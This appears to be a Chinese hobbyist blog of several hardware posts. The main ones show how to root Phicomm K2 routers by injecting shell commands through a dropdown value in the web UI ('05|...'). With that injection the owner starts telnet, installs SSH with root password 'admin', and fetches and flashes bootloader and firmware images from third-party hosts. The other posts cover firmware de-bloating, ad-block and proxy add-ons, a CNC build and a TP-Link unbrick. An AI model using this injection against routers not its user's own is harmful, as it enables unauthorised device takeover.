分类: 硬件

斐讯K2 V22.5.9.163版本安装telnet、ssh和breed的方法及净化、精简、去广告版本安装

6条评论

2017年2月25日 at 上午10:49分类:硬件

本方法采用WEB漏洞来让K2运行指定命令

1、WEB漏洞介绍

计算机连接K2(可通过wifi或LAN口),K2 WAN口连internet,先保证K2可以正常上网

用Firefox,傲游,Chrome等浏览器登录http://192.168.2.1

选择右上角的“定时重启路由器”

点选时间中的右侧下拉分钟选择框,鼠标箭头(手势)放在05上,点击鼠标右键,在Firefox或傲游浏览器“审查元素”(傲游浏览器先按“F12”按键打开审查页面后再点击定时重启):

双击"05",改为你要执行的命令,比如我们要启动telnet服务,可以输入:

05|/usr/sbin/telnetd -l /bin/login.sh

在定时重启路由器页面上重新选择05之后(这里要注意,一定要重选,并且重选后可以看到05后面自己输入的字符):

点击“保存”按钮后,就相当于K2执行了“/usr/sbin/telnetd -l /bin/login.sh”命令启动了telnet服务。

你可以通过此方法来执行多条命令。

 

2、开启telent命令

如第一节所描述,执行下面的命令即可:

05|/usr/sbin/telnetd -l /bin/login.sh

 

3、安装、启动ssh命令

在WEB页面分别输入下面几条命令并保存

05|opkg install http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/base/dropbear_2014.63-2_ramips_24kec.ipk

05|/etc/init.d/dropbear enable

05|echo -e 'admin\nadmin' | passwd root

05|/etc/init.d/dropbear start

ssh的登录用户名:root   密码:admin

 

4、安装净化版本、精简、去广告版本

利用WEB漏洞输入如下命令即可变为净化版本:
05|wget http://iytc.net/tools/k2_clear.bin -O /tmp/k2_clear.bin;sleep 1;sysupgrade -r /tmp/k2_clear.bin;sleep 1;reboot

输入如下命令可以变为精简版本(精简版本在净化版本上去除了ssh,内存占用更少):
05|wget http://iytc.net/tools/k2_min.bin -O /tmp/k2_min.bin;sleep 1;sysupgrade -r /tmp/k2_min.bin;sleep 1;reboot

输入如下命令可以变为adbyby去广告版本(在精简版本上增加adbyby去广告,缺省关闭,在广告屏蔽页面打开):

05|wget http://iytc.net/tools/k2_adbyby.bin -O /tmp/k2_adbyby.bin;sleep 1;sysupgrade -r /tmp/k2_adbyby.bin;sleep 1;reboot

执行后K2会复位两次,请耐心等待。

上述的净化、精简、去广告版本在恢复出厂设置后会失效,变为纯正的官方版本,如想切换,需再在WEB上输入上述的命令。

20170214142347

官方原始版本和精简版本的内存占用及网络进程对比图:

diffk2

 

5、安装breed

 

注意:K2 V22.5.9.163版本与目前的breed不兼容,不建议安装breed,如安装breed,需要进行修改,否则无法启动K2。目前只建议在需要降级或刷第三方固件时才安装breed!

 

输入下面三条命令

05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin

05 | mtd unlock Bootloader

05 | mtd -r write /tmp/breed.bin Bootloader

上述操作是利用漏洞执行了3条命令,下载breed并写入bootloader,最后一次保存后,路由器会写breed并重启。

下载程序需要时间,第一条命令后最好间隔一段时间再执行第二条命令。

breed的修改(降级或刷第三方固件不需要此步骤):

进入breed环境变量设置---->启用---->位置选择breed内部---->设置---->重启---->再次中断进入breed---->telnet 192.168.1.1进入breed---->手动设置启动位置env set autoboot.command "boot mem 0xbc0a0000"---->保存env save---->重启reset

20170225105841

20170225110030

如果换了其他固件需要进breed禁用环境变量。

 

 

 

 

玩转小K智能插座(K2)的openwrt系统

没有评论

2017年2月19日 at 下午5:27分类:硬件

京东买的小K二代:

 

在手机APP上查看“设备信息”,找到MAC地址,在无线路由器“DHCP分配”可以找到此MAC地址分配到的IP地址

 

然后ssh连接,用户名为root,密码为下面中的一个:

admin或1234或p9z34c

又看到熟悉的openwrt界面了:

看一下基本信息:

 

运行的进程和联网程序:

 

dmesg显示为32M内存:

[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 02000000 @ 00000000 (usable)

4M的FLASH,分区信息:

[ 0.510000] Creating 5 MTD partitions on "spi0.0":
[ 0.520000] 0x000000000000-0x000000020000 : "u-boot"
[ 0.520000] 0x000000020000-0x0000001351cc : "kernel"
[ 0.530000] 0x0000001351cc-0x0000003f0000 : "rootfs"
[ 0.530000] mtd: device 2 (rootfs) set to be root filesystem
[ 0.540000] 1 squashfs-split partitions found on MTD device rootfs
[ 0.540000] 0x000000360000-0x0000003f0000 : "rootfs_data"
[ 0.550000] 0x0000003f0000-0x000000400000 : "art"
[ 0.550000] 0x000000020000-0x0000003f0000 : "firmware"

 

CPU频率:

Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz

 

采用TL-WR703N架构:

Kernel command line:  board=TL-WR703N  console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd

 

 

斐讯K2 刷breed、第三方固件及开启telnet、ssh方法,含原版固件净化、新增功能

8条评论

2017年1月13日 at 上午9:22分类:硬件

固件发布页面:
http://iytc.net/wordpress/?p=1772

jd拿了个免费的斐讯K2:

软件版本: 22.4.5.42
设备型号: K2
硬件版本: A2

据说有收集用户信息的问题:

http://bbs.mydigit.cn/read.php?tid=1572590

需要刷第三方固件或对原版固件进行净化处理

 

1、刷breed

breed类似uboot,用于路由器的引导,刷了breed后,可以方便的刷第三方固件

这里使用的是利用网页执行脚本的漏洞安装breed

便携机无线连接K2,K2 WAN口连internet,先保证可以正常上网
用Firefox,傲游,Chrome等登录http://192.168.2.1

选择右上角的“定时重启路由器”

点选时间中的右侧下拉分钟选择框,鼠标箭头(手势)放在05上,点击鼠标右键,在Firefox或傲游浏览器“审查元素”(傲游浏览器先按“F12”按键打开审查页面后再点击定时重启):

双击"05",改为你要执行的命令:

改为:

05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin

在定时重启路由器页面上重新选择05之后(这里要注意,一定要重选,并且重选后可以看到05后面自己输入的字符):

点击“保存”按钮后,就相当于K2执行了wget获取文件的命令。

重复上述过程,分别改为:

05 | mtd unlock Bootloader

05 | mtd -r write breed-mt7620-phicomm-psg1208.bin Bootloader

上述操作是利用漏洞执行了3条命令,下载breed并写入bootloader,最后一次保存后,路由器会写breed并重启。

如果路由器没有自动重启,说明操作过程有误,请仔细检查操作过程。

你可以用此方法让K2执行任何命令(比如下面的安装SSH的命令)。

 

进入Breed方法:

拔除K2上Wan口的网线,路由器断电,持续按住路由器上的reset按钮,接通路由器电源,3秒后松开reset按钮。
在浏览器地址栏输入“http://192.168.1.1”访问Breed Web。

进入Breed Web后,请及时进行原始EEPROM、固件备份,然后再刷其他的固件。

 如果不想刷其他第三方固件,想对原版固件进行净化,继续往下处理:

开启telnet方法(此步骤可省,可直接用WEB漏洞安装SSH):

先用breed备份eeprom文件,将备份出来的文件用ultraedit修改:

将0x26、0x27位置修改为10、70,然后通过breed的“固件更新”写入修改的eeprom

重启后可用telnet 192.168.2.1进入shell界面(无密码):

或者可以用web漏洞直接执行:

/usr/sbin/telnetd -l /bin/login.sh

也可以开启telnet

 

安装SSH:

telnet登录后执行(其实ssh也可以通过WEB漏洞来安装,可以省去安装telnet步骤):

opkg install http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/base/dropbear_2014.63-2_ramips_24kec.ipk
# 开机自启
/etc/init.d/dropbear enable
# 更改root密码为 admin
echo -e 'admin\nadmin' | passwd root
# 启动
/etc/init.d/dropbear start

原版固件的净化:
进shell后,先把定时任务干掉

第二个任务是上面设置的定时重启,在web页面关闭

第一个任务比较可疑,半夜两点上传数据?

winscp找到/usr/lib/lua/luci/tools/scheduletask.lua文件

修改luci.sys.call("cp -f %s %s > /dev/null" % {defaultrule,crontabpath})

--luci.sys.call("cp -f %s %s > /dev/null" % {defaultrule,crontabpath})
luci.sys.call("touch %s" % {crontabpath})

 

 

再看有没有可疑网络程序

禁用可疑程序:

/etc/init.d/lc stop

/etc/init.d/lc disable

http_event_inform是厂家远程管理的tr069程序

/etc/init.d/tr069 stop

/etc/init.d/tr069 disable

查看可疑进程:

禁用可疑程序:

/etc/init.d/collect stop

/etc/init.d/collect disable

 

telnet不安全,把telnet也禁掉:

/etc/init.d/telnetd_startup stop

/etc/init.d/telnetd_startup disable

 

重启后网络进程清爽了:

备份修改以后的固件:

 

去除鼠标右键限制:
/usr/lib/lua/luci/view/themes/bootstrap/header.htm
找到
oncontextmenu=self.event.returnValue=false
删除

 

增加功能,比如要增加一个定时开关WIFI的功能(睡觉时间自动将WIFI关闭)

如果是通过shell几行命令就搞定了,我们搞复杂点,实现通过web来配置:
打开/usr/lib/lua/luci/view/themes/bootstrap/header.htm
找到
<li>
<a href="#" id="timeRboot" data-toggle="modal" data-target="#timeRestartModal">定时重启路由器</a>
</li>
在下面增加:
<li>
<a href="#" id="wifiRboot" data-toggle="modal" data-target="#wifiRestartModal">定时重启WIFI</a>
</li>

界面上会出现新增菜单:

依葫芦画瓢修改header.htm增加配置界面:

还需依照/etc/config/timereboot、/usr/lib/lua/luci/controller/admin/timereboot.lua增加相应文件,省略一万字...

所有实现此功能需要修改的文件打包如下,有兴趣者可以参考:

K2

 

软件包添加

现在我们尝试增加一个广告屏蔽的软件包adbyby

首先增加一个控制界面,还是修改/usr/lib/lua/luci/view/themes/bootstrap/header.htm

找到<% elseif v == "more_wlextend" then %>,在此语句上方添加:

<% elseif v == "adbyby" then %>
<li><a class="list_li1_a" href="<%=nodeurl(prefix, v, nnode.query)%>" id="adbyby" style='<%if temp=="adbyby" then%> border-left:3px solid #F08300;color:#F08300;background:#F8F8F8;<%end%>'><div><span class="icon-more_safeset iconSpan"></span><span class="textSpan">广告屏蔽</span></div></a>
</li>

再依葫芦画瓢修改/usr/lib/lua/luci/view/admin_index/index.htm文件:

else if(v == "adbyby")
{
nhref = "<%=luci.dispatcher.build_url("admin", "adbyby")%>";
$(tbsid).html("广告屏蔽")
}

增加/usr/lib/lua/luci/controller/admin/adbyby.lua、/usr/lib/lua/luci/model/cbi/adbyby.lua、/etc/config/adbyby等文件,文件内容可以对应目录powersave的内容进行修改。

刷新界面,出现新菜单:

修改的文件包如下:

adbyby

界面修改后,需加入adbyby的可执行文件,由于adbyby的文件较大,而原版固件的剩余空间较少,只有500多K:

因此需进行变通,有人做了一个在ram中运行的adbyby版本:

http://www.right.com.cn/forum/thread-191833-1-1.html

占用flash空间只有20多K,由于程序未开源,有一定风险,安装:

opkg install http://tianbao.sf.net/adbyby

开启
tb ad on

关闭
tb ad off

开启后,程序下载http://update.adbyby.com/download/7620n.tar.gz到/tmp(ram),再解压到/tmp/adbyby运行:

/tmp/adbyby/bin/adbyby

规则更新URL在/tmp/adbyby/bin/update.info文件

程序会启动一个tbb程序来定时(间隔123秒)检查下载规则

参考此程序的过程,我们可以创建一个脚本文件,比如/root/adbyby.sh,内容如下:

cd /tmp
#等待网络连接成功
wget_ok="0"
rm -f 7620n.tar.gz
while [ "$wget_ok" = "0" ]
do
wget http://update.adbyby.com/download/7620n.tar.gz
if [ "$?" == "0" ]; then
wget_ok="1"
else
sleep 30
fi
done
#解压、启动adbyby
mkdir -p adbyby
tar -zvxf 7620n.tar.gz -C ./adbyby
cd ./adbyby/bin
./startadbb

修改文件权限为755,我们可以将/root/adbyby.sh加入到自启文件/etc/rc.local中,开启自动启动,不过由于要控制adbyby启动和停止,因此最好创建一个服务,新建/etc/init.d/adbyby
#!/bin/sh /etc/rc.common
START=80
start() {
/root/adbyby.sh &
}
stop() {
cd /tmp/adbyby/bin
./stopadbb
}
restart() {
stop
start
}

修改权限为755,执行/etc/init.d/adbyby enable将服务加入自启动
下一步是将界面和可执行文件关联起来。此部分主要修改/usr/lib/lua/luci/model/cbi/adbyby.lua文件,控制adbyby的停止与运行,以及读取规则文件日期,修改文件如下:
adbyby

修改的所有文件打包如下:

k2_mod

 

完整的修改后的固件如下:

firmware_k2_blue_adbyby

ssh用户名:root

ssh及web密码:admin

 

可以用两种方式烧写此固件:

1、解压后winscp上传到K2路由器的/tmp目录,然后ssh执行“mtd -r write /tmp/firmware_k2_blue_adbyby.bin firmware”即可

2、解压后可以在breed中直接烧写此固件

adbyby功能验证:

K2界面显示adbyby运行状态显示“运行中”:

打开优酷视频(http://www.youku.com/),点击一个视频浏览,会自动跳过广告。

 

下面继续尝试加入SSR for Openwrt

K2原版固件虽然只剩下500多K空间,不过由于K2自带了libopenssl和libpcre库,因此还是可以装下SSR的

首先重新用openwrt 14.07 SDK编译源码项目:

https://github.com/ywb94/openwrt-ssr

将编译好的luci-app-shadowsocksR-Client_1.2.1_all.ipk安装到K2,注意K2需修改/etc/opkg.conf,改为正确的源地址:
src/gz barrier_breaker_base http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/base
src/gz barrier_breaker_packages http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/packages
src/gz barrier_breaker_luci http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/luci
src/gz barrier_breaker_routing http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/routing
src/gz barrier_breaker_management http://downloads.openwrt.org/barrier_breaker/14.07/ramips/mt7620a/packages/management
然后opkg update后再安装。

按照上面添加adbyby的方法在K2界面上添加SSR界面:

20170213162543接下来需要对SSR的代码进行修改,将shadowsocksr的路径由admin/services/shadowsocksr/改为admin/shadowsocksr/,因为K2原版没有admin/services/路径。

还有一点比较奇怪的是lua中不能使用“o.rmempty = false”语句了,如果使用就出错,需要把所有此语句删除。

一顿大改后,功能基本正常了,界面还需调整。

界面调整修改/www/luci-static/bootstrap/css/cbi.css,增加一些样式:

 

检查SSR的功能,发现防火墙规则没有起来,问题出在ipset上,运行ipset,提示错误:

root@K2:~# ipset list
ipset v6.20.1: Cannot open session to kernel.

搜索openwrt,发现并没有K2固件中的3.10.14内核版本,google搜索发现3.10.14为MTK出的一个openwrt版本:

https://github.com/unigent/openwrt-3.10.14

下载后重新编译所需要的各个ipk

编译成功后,lsmod可以发现能够加载ipset模块了,但是运行还是报错:

root@K2:~# ipset list
ipset v6.30: Kernel error received: message could not be created

还是不行,可能是内核原因,无解了

准备回到解放前,用iptables一条条的添加防火墙规则

好不容易把SSR给折腾成功了,目前的ssr特性:

支持两种dns解析方式:

1、远程解析:本地域名是被污染的,由远程ssr服务器进行二次解析,本地不对dns做处理

2、pdnsd解析:用支持tcp方式的dns隧道进行gfw列表站点的解析,在本地能获取到正确的域名对应的IP地址

采用路由方式进行代理:中国网段的IP不走代理;中国以外的IP走透明代理访问;

在实际测试时发现一个问题,由于设置ssr后,要对dnsmasq进行重启,日志中会打印大量gfw列表的信息:

Mon Feb 20 19:32:44 2017 daemon.info dnsmasq[6760]: using nameserver 127.0.0.1#5353 for domain 1984bbs.org
Mon Feb 20 19:32:44 2017 daemon.info dnsmasq[6760]: using nameserver 127.0.0.1#5353 for domain 1984bbs.com
Mon Feb 20 19:32:44 2017 daemon.info dnsmasq[6760]: using nameserver 127.0.0.1#5353 for domain 1949er.org

..

gfw列表有4000多条,打印信息较多,在其他openwrt可能只占用几秒的CPU处理时间,但是在K2上发现CPU占用100%(0% idle)的时间达到90秒!

没办法,重新编译了一个dnsmasq,屏蔽打印输出,替换K2的/usr/sbin/dnsmasq文件

 

 

未完待续。。

雕刻机使用记录-1

一条评论

2016年9月30日 at 下午4:25分类:硬件

买了一台玩具CNC,需要自己组装,原以为很简单,结果机械安装搞了一天一夜,才勉强能用,真是隔行如隔山。

 

包含机械雕刻和激光雕刻,前面黑色的头为激光头,激光头后面为机械雕刻头。

安装的难点在于丝杆和导轨的安装,要想安装的顺滑、阻碍小,需要反复调整,而且是几个部件协同调整,牵一发而动全身。

最难的在Z轴的调整,差点就吐血。

三个轴的定义和方向:

机械部分装完后,电路部分就很简单了,就是一个arduino主控板+A4988步进电机驱动板

根据A4988的datasheet(A4988电机驱动),我这个板设置在1/16步进模式,电机转一圈需要3200步,经过测量,丝杠5圈/cm,即2mm/圈,这样丝杆移动1mm需要半圈,需要1600步,在grbl controller中需设置xyz轴的step/mm为1600(如$100=1600):

 

三个步进电机的型号为42H47HM-0504A-23

42表示电机的安装机座尺寸是42mm

 

主电机为775电机

 

激光模块为12V300mA蓝色

TPLINK WR743N V2变砖修复

没有评论

2016年9月8日 at 下午12:48分类:硬件

1、连接TTL串口

2、在出现“Autobooting in 1 seconds   ”时按下tp两按键(有的说要tpl三个按键)

eth0: 00:00:00:00:e7:00
eth0 up
: cfg1 0xf cfg2 0x7214
eth1: 00:03:7f:ff:ff:fe
athrs26_reg_init_lan
ATHRS26: resetting s26
ATHRS26: s26 reset done
eth1 up
eth0, eth1
Autobooting in 1 seconds
hornet>

出现“hornet>”提示符

3、查看当前环境变量

hornet> printenv
bootargs=console=ttyS0,115200 root=31:02 rootfstype=squashfs init=/sbin/init mtdparts=ar7240-nor0:128k(u-boot),1024k(kernel),6912(ro
otfs),64k(config),64k(ART)
bootcmd=bootm 0x9f020000
bootdelay=1
baudrate=115200
ethaddr=0x00:0xaa:0xbb:0xcc:0xdd:0xee
ipaddr=192.168.1.1
serverip=192.168.1.100
stdin=serial
stdout=serial
stderr=serial
ethact=eth0

要改变 服务器地址可以用setenv serverip 192.168.1.181

4、计算机与路由器LAN相连,IP设置为192.168.1.100 ,开启tftp服务器

5、tftp上传固件

执行如下命令:

 tftpboot 0x80000000 743.bin 

注意:如果是8M flash把0x3c0000修改为0x7c0000

 erase 0x9f020000 +0x3c0000

注意:如果是8M flash把0x3c0000修改为0x7c0000

 cp.b 0x80000000 0x9f020000 0x3c0000

示例:

hornet> tftpboot 0x80000000 743.bin
dup 1 speed 1000
Using eth1 device
TFTP from server 192.168.1.100; our IP address is 192.168.1.1
Filename '743.bin'.
Load address: 0x80000000
Loading: *#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
#################################################################
######################################################
done
Bytes transferred = 3932160 (3c0000 hex)
hornet> erase 0x9f020000 +0x3c0000

First 0x2 last 0x3d sector size 0x10000
Erased 60 sectors
hornet> cp.b 0x80000000 0x9f020000 0x3c0000

Copy to Flash... write addr: 9f020000
done
hornet> boot

## Booting image at 9f020000 ...
Uncompressing Kernel Image ... OK

Starting kernel ...

[ 0.000000] Linux version 3.18.20 (buildbot@builder1) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r46450) ) #1 Fri Sep 4 21:55:57 CEST 2015
[ 0.000000] bootconsole [early0] enabled

输入boot命令重新启动